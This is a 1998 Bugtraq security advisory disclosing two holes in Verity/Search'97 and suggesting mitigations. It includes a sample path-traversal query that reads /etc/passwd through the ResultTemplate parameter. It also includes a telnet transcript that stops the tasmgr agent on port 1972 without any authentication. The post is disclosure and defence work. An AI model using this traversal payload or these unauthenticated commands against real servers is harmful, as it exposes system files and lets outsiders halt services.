[7270] in bugtraq
Verity/Search'97 Security Problems
daemon@ATHENA.MIT.EDU (Stefan Arentz)
Wed Jul 15 11:44:19 1998
Date: Tue, 14 Jul 1998 15:59:32 +0200
Reply-To: Stefan Arentz <stefan.arentz@SOZE.COM>
From: Stefan Arentz <stefan.arentz@SOZE.COM>
To: BUGTRAQ@NETSPACE.ORG
I've mentioned this a couple of weeks back to Verity tech support but
unfortunatly nothing has happened since.
++ Intro
There are two major security holes in the Verity/Search'97 software.
The first one is a simple CGI hack that allows anybody with permission
to execute the s97_cgi CGI script to look at files on the webserver.
The second security problem is an authorization problem with the tasmgr
application.
++ CGI Scripts
The s97_cgi and s97r_cgi programs provide an interface for web based
applications to the Verity search engine. These two programs typically
handle search queries and showing the result of those queries.
One of the parameters to the script is one in which you specify the name
of a template file that is used to show the result of the search query.
This path is relative to a directory that you have to specify in the
Verity configuration files.
The problem is that this template pathname is appended to the base
directory name without proper checking of this path for .. or %2e%2e.
This means that it's possible to jump out of the templates directory and
use any file on the Verity host as a result template. It will be send
back to the client browser in it's original form or with minor
modifications if it contained any valid HTMLscript tags (Verity's script
language).
Sample query:
http://www.xxx.com/search97.vts
?HLNavigate=On&querytext=dcm
&ServerKey=Primary
&ResultTemplate=../../../../../../../etc/passwd
&ResultStyle=simple
&ResultCount=20
&collection=books
Please note that only files can be read for which the owner of the
webserver process has permission.
++ Tasmgr
The tasmgr process, part of the Agent Server, listens on port 1972 for
administrative commands. Unfortunatly this requires no authorization
at all, so anybody can start and stop your agent processes.
Connected to search97.xxx
Escape character is '^]'.
0 Verity dcm ready
list
0 TAS-Primary
status tas-primary
0 TYPE=PROCESS; STATE=RUNNING; STARTUP=AUTO_START; PID=87632
stop tas-primary
0 'tas-primary' signalled
status tas-primary
0 TYPE=PROCESS; STATE=STOPPING; STARTUP=AUTO_START; PID=87632
where
0 /home/verity/_hpux10/bin/dcm.cfg
Nothing of this is mentioned in the manuals or online FAQs.
++ Possible solutions
For the CGI bug, use a wrapper around the Verity CGIs that checks
for .. in the argument part. This can probably also be done with
Apache's mod_rewrite. Another solution is to directly call the
Verity CGIs from your own CGI scripts. This is my preferred way.
The TASMGR problem can simply be blocked with a firewall or router
acl.
Greetings,
Stefan
--
Stefan Arentz
stefan.arentz@soze.com / http://www.soze.com/stefan
Our future is so bright we've got to wear dark shades !
